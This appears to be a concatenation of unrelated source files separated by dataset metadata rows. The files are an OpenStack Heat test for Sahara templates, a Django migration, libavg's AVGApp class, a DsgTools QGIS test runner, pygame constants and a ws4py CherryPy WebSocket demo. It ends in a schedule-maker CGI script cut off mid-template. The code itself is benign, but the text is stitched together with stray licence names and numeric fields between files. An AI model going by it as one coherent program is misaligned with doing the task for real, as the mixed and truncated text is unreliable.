# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
import six
from heat.common import exception
from heat.common import template_format
from heat.engine.clients.os import neutron
from heat.engine.clients.os import nova
from heat.engine.clients.os import sahara
from heat.engine.resources.openstack.sahara import sahara_templates as st
from heat.engine import scheduler
from heat.tests import common
from heat.tests import utils
node_group_template = """
heat_template_version: 2013-05-23
description: Sahara Node Group Template
resources:
node-group:
type: OS::Sahara::NodeGroupTemplate
properties:
name: node-group-template
plugin_name: vanilla
hadoop_version: 2.3.0
flavor: m1.large
volume_type: lvm
floating_ip_pool: some_pool_name
node_processes:
- namenode
- jobtracker
is_proxy_gateway: True
"""
cluster_template = """
heat_template_version: 2013-05-23
description: Sahara Cluster Template
resources:
cluster-template:
type: OS::Sahara::ClusterTemplate
properties:
name: test-cluster-template
plugin_name: vanilla
hadoop_version: 2.3.0
neutron_management_network: some_network
"""
cluster_template_without_name = """
heat_template_version: 2013-05-23
resources:
cluster_template!:
type: OS::Sahara::ClusterTemplate
properties:
plugin_name: vanilla
hadoop_version: 2.3.0
neutron_management_network: some_network
"""
node_group_template_without_name = """
heat_template_version: 2013-05-23
resources:
node_group!:
type: OS::Sahara::NodeGroupTemplate
properties:
plugin_name: vanilla
hadoop_version: 2.3.0
flavor: m1.large
floating_ip_pool: some_pool_name
node_processes:
- namenode
- jobtracker
"""
class FakeNodeGroupTemplate(object):
def __init__(self):
self.id = "some_ng_id"
self.name = "test-cluster-template"
self.to_dict = lambda: {"ng-template": "info"}
class FakeClusterTemplate(object):
def __init__(self):
self.id = "some_ct_id"
self.name = "node-group-template"
self.to_dict = lambda: {"cluster-template": "info"}
class SaharaNodeGroupTemplateTest(common.HeatTestCase):
def setUp(self):
super(SaharaNodeGroupTemplateTest, self).setUp()
self.stub_FlavorConstraint_validate()
self.stub_SaharaPluginConstraint()
self.stub_VolumeTypeConstraint_validate()
self.patchobject(nova.NovaClientPlugin, 'get_flavor_id'
).return_value = 'someflavorid'
self.patchobject(neutron.NeutronClientPlugin, '_create')
self.patchobject(neutron.NeutronClientPlugin, 'find_neutron_resource'
).return_value = 'some_pool_id'
sahara_mock = mock.MagicMock()
self.ngt_mgr = sahara_mock.node_group_templates
self.plugin_mgr = sahara_mock.plugins
self.patchobject(sahara.SaharaClientPlugin,
'_create').return_value = sahara_mock
self.patchobject(sahara.SaharaClientPlugin, 'validate_hadoop_version'
).return_value = None
self.fake_ngt = FakeNodeGroupTemplate()
self.t = template_format.parse(node_group_template)
def _init_ngt(self, template):
self.stack = utils.parse_stack(template)
return self.stack['node-group']
def test_ngt_resource_mapping(self):
ngt = self._init_ngt(self.t)
mapping = st.resource_mapping()
self.assertEqual(st.SaharaNodeGroupTemplate,
mapping['OS::Sahara::NodeGroupTemplate'])
self.assertIsInstance(ngt,
st.SaharaNodeGroupTemplate)
def _create_ngt(self, template):
ngt = self._init_ngt(template)
self.ngt_mgr.create.return_value = self.fake_ngt
scheduler.TaskRunner(ngt.create)()
self.assertEqual((ngt.CREATE, ngt.COMPLETE), ngt.state)
self.assertEqual(self.fake_ngt.id, ngt.resource_id)
return ngt
def test_ngt_create(self):
self._create_ngt(self.t)
args = {
'name': 'node-group-template',
'plugin_name': 'vanilla',
'hadoop_version': '2.3.0',
'flavor_id': 'someflavorid',
'description': "",
'volumes_per_node': None,
'volumes_size': None,
'volume_type': 'lvm',
'security_groups': None,
'auto_security_group': None,
'availability_zone': None,
'volumes_availability_zone': None,
'node_processes': ['namenode', 'jobtracker'],
'floating_ip_pool': 'some_pool_id',
'node_configs': None,
'image_id': None,
'is_proxy_gateway': True,
'volume_local_to_instance': None,
'use_autoconfig': None
}
self.ngt_mgr.create.assert_called_once_with(**args)
def test_validate_floatingippool_on_neutron_fails(self):
ngt = self._init_ngt(self.t)
self.patchobject(ngt, 'is_using_neutron').return_value = True
self.patchobject(
neutron.NeutronClientPlugin, 'find_neutron_resource'
).side_effect = [
neutron.exceptions.NeutronClientNoUniqueMatch(message='Too many'),
neutron.exceptions.NeutronClientException(message='Not found',
status_code=404)
]
ex = self.assertRaises(exception.StackValidationFailed, ngt.validate)
self.assertEqual('Too many',
six.text_type(ex))
ex = self.assertRaises(exception.StackValidationFailed, ngt.validate)
self.assertEqual('Not found',
six.text_type(ex))
def test_validate_floatingippool_on_novanetwork_fails(self):
ngt = self._init_ngt(self.t)
self.patchobject(ngt, 'is_using_neutron').return_value = False
nova_mock = mock.MagicMock()
nova_mock.floating_ip_pools.find.side_effect = (
nova.exceptions.NotFound(404, message='Not found'))
self.patchobject(nova.NovaClientPlugin,
'_create').return_value = nova_mock
ex = self.assertRaises(exception.StackValidationFailed, ngt.validate)
self.assertEqual('Not found', six.text_type(ex))
def test_validate_flavor_constraint_return_false(self):
self.t['resources']['node-group']['properties'].pop('floating_ip_pool')
self.t['resources']['node-group']['properties'].pop('volume_type')
ngt = self._init_ngt(self.t)
self.patchobject(nova.FlavorConstraint, 'validate'
).return_value = False
self.patchobject(ngt, 'is_using_neutron').return_value = False
ex = self.assertRaises(exception.StackValidationFailed, ngt.validate)
self.assertEqual(u"Property error: "
u"resources.node-group.properties.flavor: "
u"Error validating value 'm1.large'",
six.text_type(ex))
def test_template_invalid_name(self):
tmpl = template_format.parse(node_group_template_without_name)
stack = utils.parse_stack(tmpl)
ngt = stack['node_group!']
self.ngt_mgr.create.return_value = self.fake_ngt
scheduler.TaskRunner(ngt.create)()
self.assertEqual((ngt.CREATE, ngt.COMPLETE), ngt.state)
self.assertEqual(self.fake_ngt.id, ngt.resource_id)
name = self.ngt_mgr.create.call_args[1]['name']
self.assertIn('-nodegroup-', name)
def test_ngt_show_resource(self):
ngt = self._create_ngt(self.t)
self.ngt_mgr.get.return_value = self.fake_ngt
self.assertEqual({"ng-template": "info"}, ngt.FnGetAtt('show'))
self.ngt_mgr.get.assert_called_once_with('some_ng_id')
def test_validate_node_processes_fails(self):
ngt = self._init_ngt(self.t)
plugin_mock = mock.MagicMock()
plugin_mock.node_processes = {
"HDFS": ["namenode", "datanode", "secondarynamenode"],
"JobFlow": ["oozie"]
}
self.plugin_mgr.get_version_details.return_value = plugin_mock
ex = self.assertRaises(exception.StackValidationFailed, ngt.validate)
self.assertIn("resources.node-group.properties: Plugin vanilla "
"doesn't support the following node processes: "
"jobtracker. Allowed processes are: ",
six.text_type(ex))
self.assertIn("namenode", six.text_type(ex))
self.assertIn("datanode", six.text_type(ex))
self.assertIn("secondarynamenode", six.text_type(ex))
self.assertIn("oozie", six.text_type(ex))
def test_update(self):
ngt = self._create_ngt(self.t)
rsrc_defn = self.stack.t.resource_definitions(self.stack)['node-group']
rsrc_defn['Properties']['node_processes'] = [
'tasktracker', 'datanode']
scheduler.TaskRunner(ngt.update, rsrc_defn)()
args = {
'name': 'node-group-template',
'plugin_name': 'vanilla',
'hadoop_version': '2.3.0',
'flavor_id': 'someflavorid',
'description': "",
'volumes_per_node': None,
'volumes_size': None,
'volume_type': 'lvm',
'security_groups': None,
'auto_security_group': None,
'availability_zone': None,
'volumes_availability_zone': None,
'node_processes': ['tasktracker', 'datanode'],
'floating_ip_pool': 'some_pool_id',
'node_configs': None,
'image_id': None,
'is_proxy_gateway': True,
'volume_local_to_instance': None,
'use_autoconfig': None
}
self.ngt_mgr.update.assert_called_once_with('some_ng_id', **args)
self.assertEqual((ngt.UPDATE, ngt.COMPLETE), ngt.state)
class SaharaClusterTemplateTest(common.HeatTestCase):
def setUp(self):
super(SaharaClusterTemplateTest, self).setUp()
self.patchobject(st.constraints.CustomConstraint, '_is_valid'
).return_value = True
self.patchobject(neutron.NeutronClientPlugin, '_create')
self.patchobject(neutron.NeutronClientPlugin, 'find_neutron_resource'
).return_value = 'some_network_id'
sahara_mock = mock.MagicMock()
self.ct_mgr = sahara_mock.cluster_templates
self.patchobject(sahara.SaharaClientPlugin,
'_create').return_value = sahara_mock
self.patchobject(sahara.SaharaClientPlugin, 'validate_hadoop_version'
).return_value = None
self.fake_ct = FakeClusterTemplate()
self.t = template_format.parse(cluster_template)
def _init_ct(self, template):
self.stack = utils.parse_stack(template)
return self.stack['cluster-template']
def test_ct_resource_mapping(self):
ct = self._init_ct(self.t)
mapping = st.resource_mapping()
self.assertEqual(st.SaharaClusterTemplate,
mapping['OS::Sahara::ClusterTemplate'])
self.assertIsInstance(ct,
st.SaharaClusterTemplate)
def _create_ct(self, template):
ct = self._init_ct(template)
self.ct_mgr.create.return_value = self.fake_ct
scheduler.TaskRunner(ct.create)()
self.assertEqual((ct.CREATE, ct.COMPLETE), ct.state)
self.assertEqual(self.fake_ct.id, ct.resource_id)
return ct
def test_ct_create(self):
self._create_ct(self.t)
args = {
'name': 'test-cluster-template',
'plugin_name': 'vanilla',
'hadoop_version': '2.3.0',
'description': '',
'default_image_id': None,
'net_id': 'some_network_id',
'anti_affinity': None,
'node_groups': None,
'cluster_configs': None,
'use_autoconfig': None
}
self.ct_mgr.create.assert_called_once_with(**args)
def test_ct_validate_no_network_on_neutron_fails(self):
self.t['resources']['cluster-template']['properties'].pop(
'neutron_management_network')
ct = self._init_ct(self.t)
self.patchobject(ct, 'is_using_neutron', return_value=True)
ex = self.assertRaises(exception.StackValidationFailed,
ct.validate)
self.assertEqual("neutron_management_network must be provided",
six.text_type(ex))
def test_template_invalid_name(self):
tmpl = template_format.parse(cluster_template_without_name)
stack = utils.parse_stack(tmpl)
ct = stack['cluster_template!']
self.ct_mgr.create.return_value = self.fake_ct
scheduler.TaskRunner(ct.create)()
self.assertEqual((ct.CREATE, ct.COMPLETE), ct.state)
self.assertEqual(self.fake_ct.id, ct.resource_id)
name = self.ct_mgr.create.call_args[1]['name']
self.assertIn('-clustertemplate-', name)
def test_ct_show_resource(self):
ct = self._create_ct(self.t)
self.ct_mgr.get.return_value = self.fake_ct
self.assertEqual({"cluster-template": "info"}, ct.FnGetAtt('show'))
self.ct_mgr.get.assert_called_once_with('some_ct_id')
def test_update(self):
ct = self._create_ct(self.t)
rsrc_defn = self.stack.t.resource_definitions(self.stack)[
'cluster-template']
rsrc_defn['Properties']['plugin_name'] = 'hdp'
rsrc_defn['Properties']['hadoop_version'] = '1.3.2'
scheduler.TaskRunner(ct.update, rsrc_defn)()
args = {
'name': 'test-cluster-template',
'plugin_name': 'hdp',
'hadoop_version': '1.3.2',
'description': '',
'default_image_id': None,
'net_id': 'some_network_id',
'anti_affinity': None,
'node_groups': None,
'cluster_configs': None,
'use_autoconfig': None
}
self.ct_mgr.update.assert_called_once_with('some_ct_id', **args)
self.assertEqual((ct.UPDATE, ct.COMPLETE), ct.state)
|
apache-2.0
| -4,499,161,583,605,528,000
| 38.205805
| 79
| 0.605761
| false
| 3.784768
| true
| false
| false
|
dumel93/project-
|
type_page/migrations/0002_auto_20170711_1101.py
|
1
|
1481
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-07-11 11:01
from __future__ import unicode_literals
import django.contrib.auth.validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('type_page', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='FootballType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_team', models.CharField(max_length=64, null=True)),
('second_team', models.CharField(max_length=64, null=True)),
('draw', models.BooleanField(default=True)),
('date_game', models.DateTimeField()),
('league', models.CharField(max_length=64)),
('course', models.IntegerField()),
('bet', models.IntegerField()),
],
options={
'ordering': ['date_game'],
},
),
migrations.AlterField(
model_name='user',
name='username',
field=models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=150, unique=True, validators=[django.contrib.auth.validators.ASCIIUsernameValidator()], verbose_name='username'),
),
]
|
mit
| -2,548,361,275,656,014,000
| 39.027027
| 315
| 0.576637
| false
| 4.343109
| false
| false
| false
|
lynxis/libavg
|
src/python/avgapp.py
|
1
|
4330
|
# libavg - Media Playback Engine.
# Copyright (C) 2003-2011 Ulrich von Zadow
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Current versions can be found at www.libavg.de
#
# Original author of this file is Martin Heistermann <mh at sponc dot de>
#
from appstarter import AppStarter
class AVGApp(object):
_instances = {}
multitouch = False
fakeFullscreen = False
def __init__(self, parentNode):
'''
Initialization before Player.play()
Use this only when needed, e.g. for
WordsNode.addFontDir(). Do not forget to call
super(YourApp, self).__init__(parentNode)
'''
import warnings
warnings.warn('AVGApp is deprecated, use libavg.app.App instead')
appname = self.__class__.__name__
if appname in AVGApp._instances:
raise RuntimeError('App %s already setup' % appname)
AVGApp._instances[appname] = self
self.__isRunning = False
self._parentNode = parentNode
self._starter = None
if 'onKey' in dir(self):
raise DeprecationWarning, \
'AVGApp.onKey() has been renamed to AVGApp.onKeyDown().'
@classmethod
def get(cls):
'''
Get the Application instance
Note: this class method has to be called from the top-level app class:
>>> class MyApp(libavg.AVGApp):
... pass
>>> instance = MyApp.get()
'''
return cls._instances.get(cls.__name__, None)
@classmethod
def start(cls, **kwargs):
if cls.multitouch:
from appstarter import AVGMTAppStarter
starter = AVGMTAppStarter
else:
from appstarter import AVGAppStarter
starter = AVGAppStarter
starter(appClass=cls, fakeFullscreen=cls.fakeFullscreen, **kwargs)
def init(self):
"""main initialization
build node hierarchy under self.__parentNode."""
pass
def exit(self):
"""Deinitialization
Called after player.play() returns. End of program run."""
pass
def _enter(self):
"""enter the application, internal interface.
override this and start all animations, intervals
etc. here"""
pass
def _leave(self):
"""leave the application, internal interface.
override this and stop all animations, intervals
etc. Take care your application does not use any
non-needed resources after this."""
pass
def enter(self, onLeave = lambda: None):
"""enter the application, external interface.
Do not override this."""
self.__isRunning = True
self._onLeave = onLeave
self._enter()
def leave(self):
"""leave the application, external interface.
Do not override this."""
self.__isRunning = False
self._onLeave()
self._leave()
def onKeyDown(self, event):
"""returns bool indicating if the event was handled
by the application """
return False
def onKeyUp(self, event):
"""returns bool indicating if the event was handled
by the application """
return False
def isRunning(self):
return self.__isRunning
def setStarter(self, starter):
self._starter = starter
def getStarter(self):
return self._starter
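# Illustrative sketch (assumption, not part of the original module): a minimal
# subclass overrides init()/_enter()/_leave() and boots through start(), e.g.
#
#     class MyApp(AVGApp):
#         multitouch = False
#         def init(self):
#             pass  # build the node hierarchy under self._parentNode
#     # MyApp.start(resolution=(640, 480))  # hypothetical starter kwargs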
class App(object):
@classmethod
def start(cls, *args, **kargs):
raise RuntimeError('avgapp.App cannot be used any longer. Use libavg.AVGApp for '
'a compatible class or switch to the new libavg.app.App')
|
lgpl-2.1
| -1,709,239,406,444,618,200
| 29.492958
| 89
| 0.627483
| false
| 4.325674
| false
| false
| false
|
plamut/ggrc-core
|
test/selenium/src/lib/utils/string_utils.py
|
1
|
1860
|
# Copyright (C) 2017 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Utility functions for string operations."""
import random
import string
import uuid
BLANK = ''
COMMA = ',' # comma is used as delimiter for multi-choice values
LESS = '<' # need exclude this character due to issue GGRC-527
DOUBLE_QUOTES = '"' # need exclude this character due to issue GGRC-931
BACKSLASH = '\\' # need exclude this character due to issue GGRC-931
EXCLUDE = COMMA + LESS + DOUBLE_QUOTES + BACKSLASH
SPECIAL = BLANK.join(_ for _ in string.punctuation if _ not in EXCLUDE)
def random_string(size=5, chars=string.letters + string.digits + SPECIAL):
"""Return string with corresponding size that filled by values from selected
chars.
"""
return BLANK.join(random.choice(chars) for position in range(size))
def random_uuid(length=13):
"""Return string with predefined length base on UUID."""
return str(uuid.uuid4())[:length]
def random_list_strings(list_len=3, item_size=5,
chars=string.letters + string.digits + SPECIAL):
"""Return list of random strings separated by comma."""
return COMMA.join(random_string(item_size, chars) for i in range(list_len))
def get_bool_from_string(str_to_bool):
"""Return True for 'Yes' and False for 'No'."""
if str_to_bool.title() == 'Yes':
return True
elif str_to_bool.title() == 'No':
return False
else:
raise ValueError("'{}' can't be converted to boolean".format(str_to_bool))
def remap_keys_for_list_dicts(dict_transformation_keys, list_dicts):
"""Remap keys names for old list of dictionaries according
transformation dictionary {OLD KEY: NEW KEY} and return new updated
list of dictionaries.
"""
return [{dict_transformation_keys[key]: value for key, value
in dic.iteritems()} for dic in list_dicts]
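# Illustrative usage (not part of the original module):
#   get_bool_from_string('yes')  ->  True
#   remap_keys_for_list_dicts({'old': 'new'}, [{'old': 1}])  ->  [{'new': 1}]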
|
apache-2.0
| -5,070,785,767,555,766,000
| 34.769231
| 78
| 0.703763
| false
| 3.632813
| false
| false
| false
|
tommy-u/enable
|
examples/enable/component_demo.py
|
1
|
1333
|
"""
Basic demo of drawing within an Enable component.
"""
from enable.api import Component, ComponentEditor
from traits.api import HasTraits, Instance
from traitsui.api import Item, View
class MyComponent(Component):
def draw(self, gc, **kwargs):
w,h = gc.width(), gc.height()
gc.clear()
# Draw a rounded rect just inside the bounds
gc.set_line_width(2.0)
gc.set_stroke_color((0.0, 0.0, 0.0, 1.0))
r = 15
b = 3
gc.move_to(b, h/2)
gc.arc_to(b, h-b,
w/2, h-b,
r)
gc.arc_to(w-b, h-b,
w-b, h/2,
r)
gc.arc_to(w-b, b,
w/2, b,
r)
gc.arc_to(b, b,
b, h/2,
r)
gc.line_to(b, h/2)
gc.stroke_path()
return
def normal_key_pressed(self, event):
print "key pressed: ", event.character
class Demo(HasTraits):
canvas = Instance(Component)
traits_view = View(Item('canvas', editor=ComponentEditor(),
show_label=False, width=200, height=200),
resizable=True, title="Component Example")
def _canvas_default(self):
return MyComponent()
if __name__ == "__main__":
Demo().configure_traits()
|
bsd-3-clause
| 8,483,525,954,035,567,000
| 24.150943
| 69
| 0.501875
| false
| 3.51715
| false
| false
| false
|
lcoandrade/DsgTools
|
tests/test_OtherAlgorithms.py
|
1
|
2763
|
# -*- coding: utf-8 -*-
"""
/***************************************************************************
DsgTools
A QGIS plugin
Brazilian Army Cartographic Production Tools
-------------------
begin : 2019-07-04
git sha : $Format:%H$
copyright : (C) 2019 by João P. Esperidião - Cartographic Engineer @ Brazilian Army
email : esperidiao.joao@eb.mil.br
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
"""
Script designed to test each validation algorithm from DSGTools 4.X.
It is supposed to be run through QGIS with DSGTools installed.
* This is merely a prototype for our unit test suite. *
"""
import os
import sys
import warnings
import yaml
import shutil
from osgeo import ogr
import processing
from qgis.utils import iface
from qgis.core import QgsDataSourceUri, QgsVectorLayer, QgsProcessingFeedback,\
QgsProcessingContext, QgsLayerTreeLayer, QgsProject
from qgis.PyQt.QtSql import QSqlDatabase
from DsgTools.core.dsgEnums import DsgEnums
from DsgTools.core.Factories.DbFactory.dbFactory import DbFactory
from DsgTools.core.Factories.LayerLoaderFactory.layerLoaderFactory import LayerLoaderFactory
from qgis.testing import unittest
from DsgTools.tests.algorithmsTestBase import AlgorithmsTest, GenericAlgorithmsTest
class Tester(GenericAlgorithmsTest, AlgorithmsTest):
@classmethod
def setUpClass(cls):
cls.cleanup_paths = []
@classmethod
def tearDownClass(cls):
QgsProject.instance().clear()
for path in cls.cleanup_paths:
shutil.rmtree(path)
def get_definition_file(self):
return 'otherAlgorithms.yaml'
def run_all(filterString=None):
"""Default function that is called by the runner if nothing else is specified"""
filterString = 'test_' if filterString is None else filterString
suite = unittest.TestSuite()
suite.addTests(unittest.makeSuite(Tester, filterString))
unittest.TextTestRunner(verbosity=3, stream=sys.stdout).run(suite)
|
gpl-2.0
| 1,559,963,913,760,249,000
| 38.442857
| 102
| 0.56791
| false
| 4.810105
| true
| false
| false
|
CTPUG/pygame_cffi
|
pygame/constants.py
|
1
|
3624
|
# pygame_cffi - a cffi implementation of the pygame library
# Copyright (C) 2013 Neil Muller
# Copyright (C) 2013 Jeremy Thurgood
# Copyright (C) 2013 Maciej Fijalkowski
# Copyright (C) 2014 Rizmari Versfeld
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Library General Public
# License along with this library; if not, write to the Free
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301 USA
""" pygame constants """
from pygame._sdl import sdl
# Event types
NOEVENT = sdl.SDL_NOEVENT
ACTIVEEVENT = sdl.SDL_ACTIVEEVENT
KEYDOWN = sdl.SDL_KEYDOWN
KEYUP = sdl.SDL_KEYUP
MOUSEMOTION = sdl.SDL_MOUSEMOTION
MOUSEBUTTONDOWN = sdl.SDL_MOUSEBUTTONDOWN
MOUSEBUTTONUP = sdl.SDL_MOUSEBUTTONUP
JOYAXISMOTION = sdl.SDL_JOYAXISMOTION
JOYBALLMOTION = sdl.SDL_JOYBALLMOTION
JOYHATMOTION = sdl.SDL_JOYHATMOTION
JOYBUTTONDOWN = sdl.SDL_JOYBUTTONDOWN
JOYBUTTONUP = sdl.SDL_JOYBUTTONUP
QUIT = sdl.SDL_QUIT
SYSWMEVENT = sdl.SDL_SYSWMEVENT
EVENT_RESERVEDA = sdl.SDL_EVENT_RESERVEDA
EVENT_RESERVEDB = sdl.SDL_EVENT_RESERVEDB
VIDEORESIZE = sdl.SDL_VIDEORESIZE
VIDEOEXPOSE = sdl.SDL_VIDEOEXPOSE
EVENT_RESERVED2 = sdl.SDL_EVENT_RESERVED2
EVENT_RESERVED3 = sdl.SDL_EVENT_RESERVED3
EVENT_RESERVED4 = sdl.SDL_EVENT_RESERVED4
EVENT_RESERVED5 = sdl.SDL_EVENT_RESERVED5
EVENT_RESERVED6 = sdl.SDL_EVENT_RESERVED6
EVENT_RESERVED7 = sdl.SDL_EVENT_RESERVED7
USEREVENT = sdl.SDL_USEREVENT
NUMEVENTS = sdl.SDL_NUMEVENTS
USEREVENT_DROPFILE = 0x1000
# Surface things
SWSURFACE = sdl.SDL_SWSURFACE
HWSURFACE = sdl.SDL_HWSURFACE
LIL_ENDIAN = sdl.SDL_LIL_ENDIAN
FULLSCREEN = sdl.SDL_FULLSCREEN
RESIZABLE = sdl.SDL_RESIZABLE
NOFRAME = sdl.SDL_NOFRAME
DOUBLEBUF = sdl.SDL_DOUBLEBUF
HWACCEL = sdl.SDL_HWACCEL
ASYNCBLIT = sdl.SDL_ASYNCBLIT
RLEACCEL = sdl.SDL_RLEACCEL
RLEACCELOK = sdl.SDL_RLEACCELOK
SRCALPHA = sdl.SDL_SRCALPHA
SRCCOLORKEY = sdl.SDL_SRCCOLORKEY
HWPALETTE = sdl.SDL_HWPALETTE
ANYFORMAT = sdl.SDL_ANYFORMAT
BLEND_RGB_ADD = 0x01
BLEND_RGB_SUB = 0x02
BLEND_RGB_MULT = 0x03
BLEND_RGB_MIN = 0x04
BLEND_RGB_MAX = 0x05
BLEND_RGBA_ADD = 0x06
BLEND_RGBA_SUB = 0x07
BLEND_RGBA_MULT = 0x08
BLEND_RGBA_MIN = 0x09
BLEND_RGBA_MAX = 0x10
BLEND_PREMULTIPLIED = 0x11
BLEND_ADD = BLEND_RGB_ADD
BLEND_SUB = BLEND_RGB_SUB
BLEND_MULT = BLEND_RGB_MULT
BLEND_MIN = BLEND_RGB_MIN
BLEND_MAX = BLEND_RGB_MAX
# OpenGL stuff
OPENGL = sdl.SDL_OPENGL
GL_RED_SIZE = sdl.SDL_GL_RED_SIZE
GL_GREEN_SIZE = sdl.SDL_GL_GREEN_SIZE
GL_BLUE_SIZE = sdl.SDL_GL_BLUE_SIZE
GL_ALPHA_SIZE = sdl.SDL_GL_ALPHA_SIZE
GL_BUFFER_SIZE = sdl.SDL_GL_BUFFER_SIZE
GL_DOUBLEBUFFER = sdl.SDL_GL_DOUBLEBUFFER
GL_DEPTH_SIZE = sdl.SDL_GL_DEPTH_SIZE
GL_STENCIL_SIZE = sdl.SDL_GL_STENCIL_SIZE
GL_ACCUM_RED_SIZE = sdl.SDL_GL_ACCUM_RED_SIZE
GL_ACCUM_GREEN_SIZE = sdl.SDL_GL_ACCUM_GREEN_SIZE
GL_ACCUM_BLUE_SIZE = sdl.SDL_GL_ACCUM_BLUE_SIZE
GL_ACCUM_ALPHA_SIZE = sdl.SDL_GL_ACCUM_ALPHA_SIZE
GL_STEREO = sdl.SDL_GL_STEREO
GL_MULTISAMPLEBUFFERS = sdl.SDL_GL_MULTISAMPLEBUFFERS
GL_MULTISAMPLESAMPLES = sdl.SDL_GL_MULTISAMPLESAMPLES
GL_ACCELERATED_VISUAL = sdl.SDL_GL_ACCELERATED_VISUAL
GL_SWAP_CONTROL = sdl.SDL_GL_SWAP_CONTROL
# Keys
from pygame._sdl_keys import *
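# A minimal sketch (not part of the original module) of how these constants
# are typically consumed, assuming the standard pygame event-loop API:
#
# import pygame
# from pygame.constants import QUIT, KEYDOWN
#
# pygame.init()
# screen = pygame.display.set_mode((320, 240))
# running = True
# while running:
#     for event in pygame.event.get():
#         if event.type == QUIT:
#             running = False        # window close button pressed
#         elif event.type == KEYDOWN:
#             print(event.key)       # key code of the pressed key
# pygame.quit()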
|
lgpl-2.1
| 2,889,663,793,123,178,000
| 29.2
| 68
| 0.772903
| false
| 2.590422
| false
| false
| false
|
KanoComputing/nush
|
ws4py/droid_sensor_cherrypy_server.py
|
1
|
2357
|
# -*- coding: utf-8 -*-
import os.path
import cherrypy
from ws4py.server.cherrypyserver import WebSocketPlugin, WebSocketTool
from ws4py.websocket import WebSocket
class BroadcastWebSocketHandler(WebSocket):
def received_message(self, m):
cherrypy.engine.publish('websocket-broadcast', str(m))
class Root(object):
@cherrypy.expose
def index(self):
return """<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<title>WebSocket example displaying Android device sensors</title>
<link rel="stylesheet" href="/css/style.css" type="text/css" />
<script type="application/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"> </script>
<script type="application/javascript" src="https://raw.github.com/caleb531/jcanvas/master/jcanvas.min.js"> </script>
<script type="application/javascript" src="/js/droidsensor.js"> </script>
<script type="application/javascript">
$(document).ready(function() {
initWebSocket();
drawAll();
});
</script>
</head>
<body>
<section id="content" class="body">
<canvas id="canvas" width="900" height="620"></canvas>
</section>
</body>
</html>
"""
@cherrypy.expose
def ws(self):
cherrypy.log("Handler created: %s" % repr(cherrypy.request.ws_handler))
if __name__ == '__main__':
cherrypy.config.update({
'server.socket_host': '192.168.0.12',
'server.socket_port': 11000,
'tools.staticdir.root': os.path.abspath(os.path.join(os.path.dirname(__file__), 'static'))
}
)
    print os.path.abspath(os.path.join(os.path.dirname(__file__), 'static'))
WebSocketPlugin(cherrypy.engine).subscribe()
cherrypy.tools.websocket = WebSocketTool()
cherrypy.quickstart(Root(), '', config={
'/js': {
'tools.staticdir.on': True,
'tools.staticdir.dir': 'js'
},
'/css': {
'tools.staticdir.on': True,
'tools.staticdir.dir': 'css'
},
'/images': {
'tools.staticdir.on': True,
'tools.staticdir.dir': 'images'
},
'/ws': {
'tools.websocket.on': True,
'tools.websocket.handler_cls': BroadcastWebSocketHandler
}
}
)
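# A minimal client sketch for the server above, assuming ws4py's documented
# threaded client API (host and port mirror the server config above):
#
# from ws4py.client.threadedclient import WebSocketClient
#
# class SensorClient(WebSocketClient):
#     def opened(self):
#         # announce ourselves; the server broadcasts every message it receives
#         self.send('hello from client')
#
#     def received_message(self, m):
#         print m
#
# ws = SensorClient('ws://192.168.0.12:11000/ws')
# ws.connect()
# ws.run_forever()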
|
gpl-3.0
| -3,472,286,452,983,433,700
| 31.287671
| 125
| 0.585914
| false
| 3.735341
| false
| false
| false
|
ActiveState/code
|
recipes/Python/475112_Schedule_Maker/recipe-475112.py
|
1
|
14819
|
################################################################################
# index.py
################################################################################
import html_help
import os
import sys
import time
import Zcgi
KEYS = 'description', 'start', 'end', 'sunday', 'monday', \
'tuesday', 'wednesday', 'thursday', 'friday', 'saturday'
class soft_dict:
def __init__(self, dictionary, format):
self.__dictionary = dictionary
self.__format = format
def __getitem__(self, key):
try:
if self.__dictionary[key]:
return self.__format % self.__dictionary[key]
        except (TypeError, KeyError):
pass
return ''
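# A quick illustration (hypothetical values) of soft_dict's graceful
# degradation: empty or missing keys format to '' instead of raising.
#
#   values = soft_dict({'start': '01/02/05', 'end': ''}, ' value="%s"')
#   values['start']    ->  ' value="01/02/05"'
#   values['end']      ->  ''   (value is empty)
#   values['missing']  ->  ''   (key is absent)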
class WeekError(Exception):
def __init__(self, string):
self.__string = string
def __str__(self):
return self.__string
def main():
if Zcgi.dictionary is None:
show_form()
elif has_keys(Zcgi.dictionary, KEYS):
show_table()
else:
show_form()
def show_form(error=''):
if error:
error = '\t\t<b>' + error + '</b>\n'
values = soft_dict(Zcgi.dictionary, ' value="%s"')
Zcgi.print_html('''<html>
\t<head>
